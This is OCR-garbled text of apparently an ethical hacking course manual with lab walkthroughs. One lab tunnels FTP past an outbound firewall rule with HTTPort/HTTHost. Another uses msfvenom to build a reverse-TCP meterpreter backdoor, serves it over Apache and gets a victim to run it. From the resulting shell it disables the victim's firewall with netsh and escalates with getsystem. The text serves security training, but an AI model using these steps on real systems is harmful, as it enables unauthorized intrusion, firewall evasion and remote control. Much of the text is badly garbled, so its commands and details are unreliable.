expire network traffic yout have lemed ta doin the prevcuslab—:hey can perform “Trojan ana, registry atts, password hijacking anacs, and 0 on, which cn prove disastrous for an organizations’ nenvork Attackers may use x network probe to espn rw packet dat and then ue that oreseve pack information sich as source and destination IP addreses, por, flags, header lengths, ‘heeksums, tine to live (ITL}, and protoeol pe ‘Thus, as a network sdministaun, you should be able wo identify anacks by cextacig information fom capeuted trafic such a source aa destination IP audreses, protocol ype, header length, source and destination ports, and son, and compare these desis with modeled stack signatures to determine if 20 suck has occurred. You can also check aac logs for lists of aac, nd take luo, you should be Smit with ETP euncting technique, by which you can idsody additional security cake that may not be readily visible by cooing simple network and vuloctablity scanning, nd determine the extent to which 2 ‘network IDS can ientfy malicious waffle in » communication channel. In this Tab, you wil ean HIFTP tunneling using HTTP Lab Objectives “This lab will show you how networks ean be scanned, and how to use H'TTPost and HITT Host to bypass firewall restrictions and access files. ‘atta Manat Pao Tica tning and Comermemene Cops Oy KO “MiRdheRomel arabebons SevereMatte 2-Eveding 05 Feewaly an Honeypot Lab Environment In this lab, you will need the HT Port took, ‘= HITPor i located ¢t ZACEH-ToolsICEM¥10 Module 12 Evading IDS, Firewalls, and HoneypotsiMTTP Tunneling Tools\MTTFort © You can download the test version of HITPort from the link etpsiwnw targeted orgintthost "yo decide to download the latest version, then sezeenshots shown ia Crteote the lab might differ demonstrated in 4 Joscall HTTHost on Windows Server 2012 Virtual Machine a Iastall HTTHose on Windows Server 2012 Virtual Machi sraitble in ‘= Iostal HITTPorton Windows Server 2016 Machine 2aceH. aol Follow the wizard driven installation steps and iostall i Module 12 Administrative privileges ate required to nun this too! Evading 108, Bomar This lb might not work if remow server fiters/blocks HTTP esnpeling Honeypots packets Lab Duration "Time: 20 Minutes Overview of HTTPort rTPort creates a transparent tunod through a prony server or Grewall. HI'TPort allows using ll ome of lncemee software from behind dhe proxy, Iebypasees MTT proxies ani HTTP, frewalls, ed transperent accelerators. Lab Tasks 1. Logiow the windows Server 2012 virual mache aaah mal a ied Genero Cosh Cy mask Tighe ned opcictn ec eeeMa 12-Evding 18, Frew ort Honeys 2. Wait forthe Server Manager to sar. Server Manager 5. The Server Manager window appears click Add roles and features,‘Gattat Mana Peso Modul 12 Ever 08, Prewalle and Honeyeote 4, The Add Roles and Features Wicand winlow sppes click Nant Before you begin sn SSE re cat 5, The Select instaltation type section appears select Role-based or fosture based installation dio ton and cick Next. Select instabation type SS TROLS ganna "ic ning nd Conmeme opr , Hm MiRibe hoot apmintons ty ReneMae 12-Evedng 1, Frowal, and Honoyots 6. “The Select destination server vction appears click Next, Select destination server 17. Under Select sorvor roles, check Web Sorvor (8), and click Noxt [Note Ifthe Add Rotes Ward dislogbox ppears, dick Add Required Features, Cab Pas "ial Hack and Gnaemcvu pra EB “iiiissewe Mposetoe mse PanMatte 12-Evadrg 05 Frewalls and Honeyots 8, The Introduction to Web Server (lI) pane appears click Next, ‘he esturesthat re requited for Wb Serer 57 Teter enon ihe crc 2 Wane Mee ak elise Cone © hetcemeagenet nc arr "PGIRE Stemi Nason Btn 9, The Select features section appears; check Management Data 11S ‘Extonsion box ae cick Not, Select feotwes C38 apenas [Note Ifthe Add Roles Wizard alogbox appear cick Add Required Features. Sar Mama Feo ‘ica ang Gomes Soph Oh Kea ‘ingyen epostModule 12 Evading DS Frown an Honeypot 10, In the Confirmation pane, click tall Confirm instalation selections 11, Wale forthe sdected roles tobe installed. Instalation progress =) AGUS git ‘atta Manat Pao "Wi Hacing wel Coomera Crh oy SEN “idk sinters Sever eetMatte 12-Evedng 6, Preval nd Honeyots 12, On completion of instalation, you wll be rediccted to the Remults pane. CURLS tara cd 13, Clone the Server Manage window. 14, Now, you necd w stop '$ Admin Service and World Wide Web Publishing services. Brasx = 15, Gick star, and navga to Adminietrative Toots > Services. ‘top World Wide Web Publishing Greil PeMatte 12-Evadng 15 Frewala n Honeots 16, Right-click World Wide Web Pubitshing Service, au dick Stop. CaMTTPort ‘supports strong trate encryption, wich makes proxy loging toless, and ‘supports NTLM ‘and other ‘schemes. ARES Si AL Hye Sr 17 Inthe sume way, rightclick MS Admin Service, and cick Stop. east 18 Open Mapped Network Drive and aavigte to ZACEH-ToolsiCeHvi0 canal Module 12 Evading IDS, Firewalls, and HoneypotsiHTTP Tunneling HTTHoat ‘Tools HTTHost, 19, Open the HTTHest fold, od double-click Mthostexe. 20, Ifthe Open Fite - Security Warning pop-up appears, click Rum 21, AMTTHost wizard appears cick Options ib, 22, On the Options tab, type 90 in the Pert eld under Network section keep the other settings 0 default except for Personal password, which should ‘contain any other password. le this lab, the Personal password is “magle:” |Note: Typical, HIP tanning should be performed using pore 0. sport Disbeing used to hos the local webs, therefore we have wed port 9 far this lab, Cab Mt ys Tied Haan Gunes Cn “iRise gcbetoes dy eeeMotte 12-Evedg 10, Prova, nd Honeypot 23, Check Revalidate DNS names znd Log connections, ae ick App. tind iting Sd onal Teset up rs UaTTPet you nocd [ hsnohanened is tepotn your Horton rial 1 hand on” fee ee Bere TF Revaldais ON name I tos eonnacione HG epee 24, Check see the ast lines Listener stoning at 0.0:0.090, which ensues ‘hat HTTHostsrunsing propely and has begun to isin on port 9. 1G 14a ‘ial intng nl Gomez Copy ym Grama Pas Ting nol Risley RehMaul 12-Evedng 105, Few nd Honeypot 25, Now, leave HTTHost inact, and don't wun off she Windows Server 2012 virmal machine. Brass 26, Now, switch to (Windows Server 2016) sight-dlick the Windows icon, 2d ick Control Pane Outbound Rute 27, The Controt Panel window appears with all control pand items displayed Selec Windows Firewall URES Opi ini Fra "a Faigle ah akMotu 12: Evedng 105 Frowals and Honeys 28 "The Windows Firewall contol pan! sppeaes click Turm Windows Firewall conor of ink in the left pane. ROLES ngnty Wana 29. The Customize Settings window appears 30, Select Turn on Windows Firewall (under Private network settings and Pubic network settings) oS NcLAEsan Cnty Manse 32. Firewalls saccesflly tured on, Now, click Advanced settings in the lef IGE Conny ne hd Fa ‘Gavan "Ea Hang and Gonemems opr | Mince tpacion ayeModule 12 Evang OS Frown ond Honeypot 3, ‘The Windows Firewall with Advanced Security winow appears, 34, Select Outbound Rules in the left pane A lise of outbound resis displayed. Gick New Rule. the rght pane (woket Outbound Res) urement NGLNSZAig anv FEISS" 35 tn he tew Oto de Wat Porshe Raley ad ck Fpbeted eng ‘aattat Manat Pas “Bia Hacking al Cones Cry WER “MiRdheRomel arabebons Severe3. Unde Action, Block the connection is selected by default lick Momt a a aa =e =e oe Mack epocaMatte 2-Eveding 05 Feewaly an Honeypot 38 In the Profle section, ensure that all the options (Domain, Private and Pubic) ae checked, 20d eck Ment 39, Under Mame, spe Port 24 Blocked inthe Mame field, nd click Finish. inearnrcrpn Sai Be {Ei Hag nd Gree Cpr Oy Tips owe pwacions ty eeeMatte 12. Evedng 1, Frewaly and Honeypot Streninaniraly 40, The ew rile Port 24 Blocked screed, as shown in the seeenshot Trrtapeear vie = sc it ‘Sinn Biren ten sine steeagh a gh 42. The Propertos window for Port 24 Blocked rule appeas. 43, Select the Protocols and Ports an the Remote port fd, slece Specie Pres option fram the drop-down list, and enter the port number a8 24. 44, Leave the her deat setings, click Apply, and then click OX, SaacN, GLASS wl ed Pee ‘Gea et er Tic Nacang ond Gonemenns Ci 48m Tigi Roce on ebModule 12-Evadrg D5, Freeland Honeypot 45, Disable the rule and check ifyon ate able to connect to the ip ste Bras = pare 46, Right dick the newly added rl, and click Disable Ro, Accessing FTP 47. Taurch the command prompt, and issue fp 10. toner the wsemame, Sts oaw tpn Noten the sbowe mentioned command, 10:10.10.40 refers to the IP adress ene igeczen of che Windows 40 wire the fp sites located, Make sre that you isue the IP fie ‘yen cress of Windows 10 in yon ab environment 48, This meaos you ae abe to establish an FIP connection. 49, Now, enable the fue, and check to see whether you ean establish a 50 Right dick the new added ul, and click Enable Rate SL. Launch the Command Prompt and check whether you ae able w connect ‘the fp site by issuing the command ftp 10.40.40:10Przcen ‘ToolsCEHVIO Module 12 Evading 1S, Frewall, and Honeypots Motu 12: Evedng 105 Frowals and Honeys 52 ‘he added oubound rule should block the connection shown in the screenshot Note: the shove mentioned command, 104040.40 rele 19 the IPaddess ‘of Windows 10 where the fp site is losted. Make sare that ou ise the IP tudes of Windows 10 in yous ab environment 53. Now, we shall perf tunneling using MTTPort wo establish a connection with the PIP site located on Windows 10, 54, Navigate to ZHCEH-ToolsGEHv40 Module 12 Evading IDS, Firewalls, and Honeypots¥HTTP Tunneling ToolsIMTTPort, and. double-click Ietport3entim.oxe, 55, 1fOpen Fle Security Warning pop-up appeats, click Rum. 56, Follow the instalation stops to insall HTTPore Welcome to the HTTPort Setup Wizard Larecomendedtht ou cos a aber aphaton belo ort (ek Nato crerun.cCaedio wt Seu ca Pos ‘ia ign Gacy Km ‘ayer tort RopeMotul 2-Evedng 105 Frowals and Honeyets 57. Launch HTT Port (Httport3SNFM) fom the Start meno Grase Perform HTTP “Tunneling 58. An Introduction to HTTPortwizarl appears click Next five times, sl you ‘come tothe lst wizard pane nd then dick Close. Frredacion te TTPo ] ol Gatien Pe Tie Haig a Gone Ta fghetomenl Upecitone saGene Porat cen ropeumemee Eenesnewcel os Soper tecame (Cera awn P| Mati fear 5 oath an pt 58. The IIT1Pon mainwindow QETTPeM 3NPM) spa, as shown in thescwensioe TiPon SSN = % 5 Port mapping | About| Register| TTP proxy to lypeas (Hank = cet or Bema) Fete Port a TF Proxy requires authentication Usemame: Password: pif ise options Useragents Bypass mode: E60 =] [auto Use personal remote host at (blank = use puble) Host name or1P address: Port: Password ei 2 | thie bution helps start 60. On the Proxy tab, enter the Host name or IP address (10.40.40.12) ofthe machine where HTThos ising Windows Server 2042}. Note: The location of the Windows Server 2012 may vary in your bb G1. Rater the Port number 80 62 Under Misecoptons, Bypass mode, tlect Remote host from the drop. down is. 3. Under Uso porsonal romote host at folank = uso publ), re-enter the IP adress of Windows Server 2012 (101010442) and port numibe 80, ‘Biol ang nd Gomencaan Cop Oy Ema “iia iouee peers eylaprepiaetiin ‘Reb sifoncn aeriein Feiner (Cab Ml Pas Module 12-Evadrg 105, Frown and Henaypots 64, Ker the password magi in the Password Geld = x HTP proxy to bypass (lark = det or Fra proxy rues athertintion Uemura aon: ae ral 2) Tie button hoe IGE SHEET nn 65, Select the Port mapping ab, and dick Add to crete anew mapping, 7 % sistem | ry [PETS Aoi eater] state To/P pot mares (male) ———— i CO] fe vac on camel ooo) Emenee: 3 mevoner (ean) IF nun socxs corer (prt 1080) Fru socks suppor (8m) Toms but nape ICEL UTTRarowereaNee ges "ital Hack Gnaencvu Gl Bm “ikke Mposetoe ass Maton2 tn this kind of environment, the federated search web part of Microsoft Search ‘Server 2008 wil not work outer: woenly support om-password (Ca Maral a Module 12-Evarg 05, Feats and Honeypot 66, Right he New mapping nos ad cick Ea HTTPon 3SNFM ee System | Proxy Por mapping | About| Resister| Static TCP/IP port mappings (tunnels) ade Remote host Temote.host.name Remote port ° No stats - inactive flax ale B/see Built-in SOCKSA server FF Run SOCKS server (port 1080) ‘Available in "Remote Host” mode: T Full sockss support (81ND) 2] Chie button halos 67, Rename hs sp tea Go can ene theme of your ce). 68, Right-click the node below Local port, then click Eat, and enter the port value as 24 69, Right-click the node below Remote host, click Edit, and rename it as 40.4040.10,Matt 2. Evading 105 Prova amd Honeypot 70. Right-cick the node below Remote port, then cick Balt, and enter the pore values 21, ‘Note: 10.10.10.10 specified in Remote host node is the IP address of the Windows 40 achine that is hosting the FTP se. FiTPor SSNFM K System | Proxy Per mapping | About| Register| Static TCP/IP port mappings (tunnels) 40.10.10.10 7 Run SOCKS server (port 1080) ‘Available in "Remote Host’ mode: T Full Sockss support (810) _2| Chie button helps ‘ea ang nd Gomera Co HE Mac kowes tpeetont Sy eetMute 12-Evedg 19, Feewa, md Honeypot 7, Switch to the Promy tal, and lick Start to bagia the HTTP tunneling Tiron an = x foe ee 72. HITT Port interes the fp request tothe localhost and tunnels chrowgh it HITTHest is insted in dhe erpoxe machine w conc you to 1040.40.40. 73, This means you may not acces fip site diecly by issuing ep 10.40.40.40 the command prompt, but you will beable to acces it through dhe local host by ising the command ftp 127.0.03, 74, Taunch Command Prompt and typ ftp 10.40.40:10, Press Entor, The fp connection wl be Blocked by the outbound frewall ue, 75, Now bunch « new Command Prompt, pe fp 127.0.04 and press Enter, ‘You should beable to connect to the site Note: Ifyou isve this command witout ssring HI'TPort, the connection 19 FIP se fl, searing thatthe FTP conection is refused ag Geen Crh 1 EaMatto 12- Evading 105 Frowals and Honeyots 76, Enter dhe credentis of any user secount of Windows 10, la his lab, we are sing the credentials of che Jason account (atrname : Jason, Password: ¥ qwerty) Type the uscrame (Jason) and press Enter. Note: The pasrworl you enter won'tbe visible 77, You se succesfully logged in, even aie adding 2 Grevall oubo inferring that a tunnel has been established by HITTPor and F bypassing the fsewall, ost, 78. Now you have access toad flesin the ip drectonylocated in the Windows 10 viwal machine 79, Type mk Feat and pss Ente. 80, A directory named Test willbe cated in the FTP folder on te Windows 10 (ocaton: GAFTR) viral machine, a shown inthe screenshot 81 ‘Thus, ou are able to bypass HITTP proxies a5 well a Grewal, and thereby acces files beyond them, "Note: On cumpleson ofthe ab, cete the crested outbound rao, sop HEeHost sod MTTPort ard cable the firewall (which was enabled in the beginning of te lab) in the machine (Le, Windows Server 2046), ax str: the World Wide Web Publishing Service on the Windows Server 20%2 vital machine Manat Pao B Cocca Co EEMotu 2-Eveding 105 Frowals and Honeys Lab Analysis, Document ll the IP dese, open pots and runing aplication, al prosocos yen dacoered dig the PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS. RELATED TO THIS LAD, {Gin ca Mon a75 vane F rensoe hove ID wanton view ‘Geena Pete Mate 12 Evading 05 Frewalls nd Honeypot Bypassing Windows Firewall using Metasploit Metasploit Framework is «tool for developing and executing exphit code aginst ots target machine. Lab Scenario “Lange compenies are common targets for hackers and atackers ofall stripes, and itis not uncommon for these companies to actively monitor trafic to and from their esial IT infrastrctore, Judging by the functionality of Trojans, we ean safely surmise that they are designed to open buck doors on compromised ‘computers, allowing remote atackers to monitor seiviy snd steal information, ‘Once installed ins a corporite network, the Trojn's backdoor feature also allows atackers to use the initially compromised computer as a springboard t0 Iauoch further forays into the rst of the inraseuctae, resulting in the possible theft of a wealth oF information, which could be far greater chan any tht exis fon asingle machine "The basic principal ofall malicious programs is that they require user support to damage the initial computer. That is why Trojan hore ty to deceive users by dsplaying some other form of emai. Backdoor programs are used 1 gain ‘unauthorized access to systems, and backdoor software i used by hackers to gain access to systems, so that they can send the malicious software to that particule system. Hackers/attackers infect tamget environments with customized ‘Trojan horses (Gickdoors) to determine exploitable holes in security systems. As a Security Administrator of your onpanizaton, your jeb responsbiltes inchude protecting the network from ‘Trojans and backdoors, Trojan atacks, te theft of valuable data/Identies, privilege escalation, persistent beckdoors, end so on. ‘ica aga Gnas Cop OEE “tis Rapes Sey RoanBoras rr cd gan Gum Cari ate 12 racing 15, Frowal al Honeypot Lab Objectives “The objective of his ab sto hep rents am o detect Trojan an backdoor taco. “The objectives of this ince: * Creating server and testing the network for aack + Attacking a nework using a simple backdoor and Bypassing the Firewall Lab Environment "To complet his lab, you will need: + A computer running Window Server 2016 Kali Linux runniagin Virwal machine (Attacker machine) * Windowstnsnning in wttual machine (Victim machine) + Aweb browser with Intemet access * Adninstntve privileges to nun tools Lab Duration “Time: 20 Minutes (Qverview of Trojans and Backdoors. A Trojan iss program that contains malcioes or harmful code nse apparently hnarmless programming ot data so that i¢ can obain conwol of a computer oF system and cause damage, such as mining file allocation tables ona hurd dive, Lab Tasks 1. Before maning this lab, log into Windows Server 2012 and ttn ON Windows Firewall. teams ite tocwed prick ach etMatte 12- Even 105, Feewely nt Honeypot 2. Tumningon Windows Fizewall ensures that the computer is secure 3. Now, go to Start > Administrative Tools > Windows Firewall with Advanced Security. Windows Firewall with Advanced Security ‘window appears displaying the Fixevall stat i all che profiles as shown in the sreenshot 4. Close the window, Now, you will ned to bypass this Firewall and launch a meterpreter session. Once Irunched, you willbe shown how to disable a Firewall on ‘he target machine through meterpreter shell, Treen rT 6 Leginto the eal Lina vewal machine ‘Type root in the Usemame text Geld, and click Next. Logon to alt ‘nw Geib Mm Pee SSSSCSSSCR a gd Cac a Rico Sepdctn Sey PldMotus 2: Evading 105 Frew on Honeypate 8, “Type toor in the Paseword tex: field, and click Unlock, 9, Click the Perminal con from the taskbat. ‘and Metacploit| ‘Services Gotta iat ‘Bla ting nd Gomermemnn Cop Km sich tameMout 2- Evading 1, Frew nd Honeyets 10, Type the command mstvenom -p windowsimeterpreterieverse tcp ~ platform windows -a x86 -e x86lshikata ga nai -b "wx00" LHOST=10.10.10.11 -£ exe > DesktopBackdoorexe in terminal ‘window and press Ente. Note: 40.40.40.41 isthe IP address of Kal nsx, which might differin your bab eevitonment. pct Vw semch Temi 1p 11. The above command creates a Windows exeeutable fe named Cimetaceoit "Backdoorexe," which will be saved on the Kall Linux Desktop. Framer aot {or covolopig ond remote target TD tasea — 12 Now, you need to share Backdoor.exe with the victim machine Gn this ee ub, the Windows Server 2012) 13, Open a new command ine termina, type mkdir Nartwowintmshare nd press Enter o create anew dtectory named “share.” Backdooraxe File 14, Change the mode of the share folder to 758 by typing the command chimed -R 755 Wvarwoewntial/share! 2nd pressing Enter 15, Change the ownership of that folder to wwwedata by sping chown wrurmdatarwwnndata Warlwwwmlishare sid pressing Enter hig Conn a OmMatte 12. Evedng 1, Frewaly and Honeypot 16, Type eta arerrwhet | grep share anc press Enter, ie ik vw Semch_ Tomo 17, Sure the apache sorver: ‘Type service apache2 start in Terminal Erte runthe apache web ‘server use the {eltoning ‘commands epiroctmsta datas exploita Narvew ocr! cin vew Sexch Tense 18, The apache web server is now running; copy Backdoor.exe into the share folder 19. Type ep lrootDesktepiBackdoor.exe ‘varwwwintmlisharel in the terminal nd press Enter 20, Lasnch mefeonsote 21. Type use exploitimultihandler and press Enter 10 handle exploits lnunched outside the framework "=a rita en Pi ‘Bilal ign Games Cp OKO‘Module 12-Evedrg 05 Frowalls and Honeyts 22, lesue the following commands in msfeonsole: at wincowsimaterpreterieverse.tep and press 1) Type eet umosr 10.10.10.41 and press Enter. ©) "Type show options and press Enter to display all the options arsigned to the payload, IP auddress entered in LHOST refers to the attacker machine (ie, Kali Linus) and it might vary in our bb environment. 24, To star the handle, type explott--2 and press Enter. — i ting amen on OyMa 12-Evding 18, Frew ort Honeys 25, Switch back tothe Windows Server 2012 virtual machine. Observe that the Firewalls ON. 26, Launch Moaitia Firefox (or other web browsed, and ype ntps/40.40.t0.1Miehara in che adress field Then press Enter. ‘Note: Here, 4010.10.11 is the IP adress of Kali Linux, which may differ ‘your lab cnviroament. 27, Click Baekdoor-ene wo download the backdoor file Index of /share Sime Lami Sr Dessisn [= ee Spas 2427 nin one 18.01 CURR GIs Dora eke ‘Siva Moa ‘ica ating snd Gomme Cop Ham “igh neve upeesous tcMotu 2 Even DS, Frowal nd Honeyte 28, The Opening Backdoor.exe pop-up appear: click Save Fle, Lit you aiat have apache? Veuve chants pe Installed, run apt. as ‘oot install apache ich ny Fie 721 29, Close the browser, 30. By deftly, this file is stored in Catlsers\NeminitratorDownlonds ‘Note:The download location might vary ia your lb environment. 31, Navigate to the download location (hte, :\Users\AdministratoriDownloads), and double-click Backdoor-exe, 32. Ifthe Open Fil- Security Warning sppess lick Run. 33, Close the Downloads window 234, Switch back tothe Kalf Linux machine. The Meterpeter session has been successfily opened, as shown in the sereenshot ars Tied aking a Guns Co KmMatte 12. Evedng 1, Frewaly and Honeypot 35, Type sessions and press Enter to view the active sessions 36, Type sessions 11 command and press Enter. (“1” in “sessions 1” ie the sesion id suber). The Meterpreter shell isIaunched, as shown in the screenshotMate 12-Evedig 0, Frown md Honeyots 39, Type esate 4 coeds oan pom Ene Ths cet chanel TE eases clip wich yoo can aces the eommand shell ofthe victim machine Launch Remote an 38, Note the Ehannet number (here, 9) a= 39, Type anett and pres Enter. 40, ‘Tis allows you to interact with the command shell of the vitim machine,Borasn Frowall Mute 12-Evedg 19, Feewa, md Honeypot 41. Type netah firewall show opmode and press Enter. "This displays the status of the firewall onthe victim machine 42, Observe that ll the firewall configurations are enabled. 43, Type nateh advtirowal sot allprofiles state off snd press Enter, This ums of frewal state forall the profiles on the vieim machine 44, 1the Grewal is successfully disabled, it renurns the message OX. ag Geen Crh 1 EaMatt 12 Eendng 5, Frowatls nd Honeys 45. ‘Thus, you have succesfily launched meterpreter shell and disabled the firewall on the target machine 46, Now switch back to the windows Server 2012 and view the firewall profile in Windows Firewall with Advanced Settings control panel 47. Weis observed that the firewall in all dhe profiles has bees succesfly tumedl off a show in the shove screenshot. 48, Switeh back 10K press Enter. 49. You will ome back wo the meterpreter shell, a shown in the screenshot Linux, ype exit in the command-line terminal, and oe ‘Getta Monat Pas i ag memes i OtaMate 12-Evedig 0, Frown md Honeyots 50, Type getaystem and press Enter. Doing this might help in gaining system level pvleges remot Note: This command works oaly on Server machines such as Windows Server 2012 and 2016, Tae 51. Type ps and press Entr, This ists all he processes running machine. 52, You may issue help command to view the other post exploitation commands,Mato 12-Eveding 105 Frowals and Honeyots Lab Analysis ‘Arle td document thereat to his xe. Provide your pinion of your arts seauiy pane and exposure though ub and fe nformason, PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB. OYes @No Platform Supported Classroom Bitabs Sepa Pee ic Hac ad omens Co Oy HS MEkpactowwel Upactors cy ated